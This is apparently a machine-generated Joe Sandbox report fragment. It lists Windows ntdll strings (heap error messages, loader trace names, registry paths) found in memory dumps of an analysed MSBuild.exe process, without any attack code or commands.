                                                                                                                                                                                                                                                                  • API String ID: 2994545307-1391187441
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  • HEAP: , xrefs: 01393264
                                                                                                                                                                                                                                                                  • HEAP[%wZ]: , xrefs: 01393255
                                                                                                                                                                                                                                                                  • Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 0139327D
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
                                                                                                                                                                                                                                                                  • API String ID: 0-617086771
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                                                                                                                                                                                                                                  • API String ID: 0-3178619729
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                                                                                                                                                                                                                                  • API String ID: 0-4253913091
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  • HEAP: , xrefs: 01381596
                                                                                                                                                                                                                                                                  • HEAP[%wZ]: , xrefs: 01381712
                                                                                                                                                                                                                                                                  • HEAP: Free Heap block %p modified at %p after it was freed, xrefs: 01381728
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                                                                                                                                                                                                                                  • API String ID: 0-3178619729
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                                                                                                                  • String ID: $@
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID: FilterFullPath$UseFilter$\??\
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID: LdrpResGetResourceDirectory Enter$LdrpResGetResourceDirectory Exit${
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID: %$&$@
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  • LdrpCompleteMapModule, xrefs: 013EA590
                                                                                                                                                                                                                                                                  • minkernel\ntdll\ldrmap.c, xrefs: 013EA59A
                                                                                                                                                                                                                                                                  • Could not validate the crypto signature for DLL %wZ, xrefs: 013EA589
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  • HEAP: , xrefs: 0142DC1F
                                                                                                                                                                                                                                                                  • Heap block at %p modified at %p past requested size of %Ix, xrefs: 0142DC32
                                                                                                                                                                                                                                                                  • HEAP[%wZ]: , xrefs: 0142DC12
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID: HEAP: $HEAP[%wZ]: $Heap block at %p modified at %p past requested size of %Ix
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID: HEAP: $HEAP[%wZ]: $Invalid address specified to %s( %p, %p )
                                                                                                                                                                                                                                                                  • API String ID: 0-1151232445
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  • @, xrefs: 0143C1F1
                                                                                                                                                                                                                                                                  • PreferredUILanguages, xrefs: 0143C212
                                                                                                                                                                                                                                                                  • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 0143C1C5
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                                                                                                                                                                                                                                                  • API String ID: 0-2968386058
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                                                                                                                                                                                                                                                  • API String ID: 0-1373925480
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  • Actx , xrefs: 013B33AC
                                                                                                                                                                                                                                                                  • SXS: %s() passed the empty activation context data, xrefs: 013F29FE
                                                                                                                                                                                                                                                                  • RtlCreateActivationContext, xrefs: 013F29F9
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID: Actx $RtlCreateActivationContext$SXS: %s() passed the empty activation context data
                                                                                                                                                                                                                                                                  • API String ID: 0-859632880
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  • \Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\, xrefs: 0140B632
                                                                                                                                                                                                                                                                  • @, xrefs: 0140B670
                                                                                                                                                                                                                                                                  • GlobalFlag, xrefs: 0140B68F
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID: @$GlobalFlag$\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\
                                                                                                                                                                                                                                                                  • API String ID: 0-4192008846
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  • BuildLabEx, xrefs: 013C130F
                                                                                                                                                                                                                                                                  • @, xrefs: 013C12A5
                                                                                                                                                                                                                                                                  • \Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion, xrefs: 013C127B
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID: @$BuildLabEx$\Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion
                                                                                                                                                                                                                                                                  • API String ID: 0-3051831665
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  • Process initialization failed with status 0x%08lx, xrefs: 014020F3
                                                                                                                                                                                                                                                                  • LdrpInitializationFailure, xrefs: 014020FA
                                                                                                                                                                                                                                                                  • minkernel\ntdll\ldrinit.c, xrefs: 01402104
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                                                                                                                                                                                                                                  • API String ID: 0-2986994758
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: ___swprintf_l
                                                                                                                                                                                                                                                                  • String ID: #%u
                                                                                                                                                                                                                                                                  • API String ID: 48624451-232158463
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID: @$@
                                                                                                                                                                                                                                                                  • API String ID: 0-149943524
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID: `$`
                                                                                                                                                                                                                                                                  • API String ID: 0-197956300
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  • ResIdCount less than 2., xrefs: 013DEEC9
                                                                                                                                                                                                                                                                  • Failed to retrieve service checksum., xrefs: 013DEE56
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID: Failed to retrieve service checksum.$ResIdCount less than 2.
                                                                                                                                                                                                                                                                  • API String ID: 0-863616075
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  • RtlpResUltimateFallbackInfo Enter, xrefs: 0138A2FB
                                                                                                                                                                                                                                                                  • RtlpResUltimateFallbackInfo Exit, xrefs: 0138A309
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                                                                                                                                                                                                                                                  • API String ID: 0-2876891731
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID: LdrResGetRCConfig Enter$LdrResGetRCConfig Exit
                                                                                                                                                                                                                                                                  • API String ID: 0-118005554
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID: .Local\$@
                                                                                                                                                                                                                                                                  • API String ID: 0-380025441
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                                                                                                                  • String ID: Cleanup Group$Threadpool!
                                                                                                                                                                                                                                                                  • API String ID: 2994545307-4008356553
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID: MUI
                                                                                                                                                                                                                                                                  • API String ID: 0-1339004836
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID: P`vRbv
                                                                                                                                                                                                                                                                  • API String ID: 0-2392986850
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID: 0
                                                                                                                                                                                                                                                                  • API String ID: 0-4108050209
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1872655625.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID: (
                                                                                                                                                                                                                                                                  • API String ID: 0-3887548279
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID: PATH
                                                                                                                                                                                                                                                                  • API String ID: 0-1036084923
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 0-3916222277
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 0-3916222277
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID: PreferredUILanguages
                                                                                                                                                                                                                                                                  • API String ID: 0-1884656846
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID: kLsE
                                                                                                                                                                                                                                                                  • API String ID: 0-3058123920
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
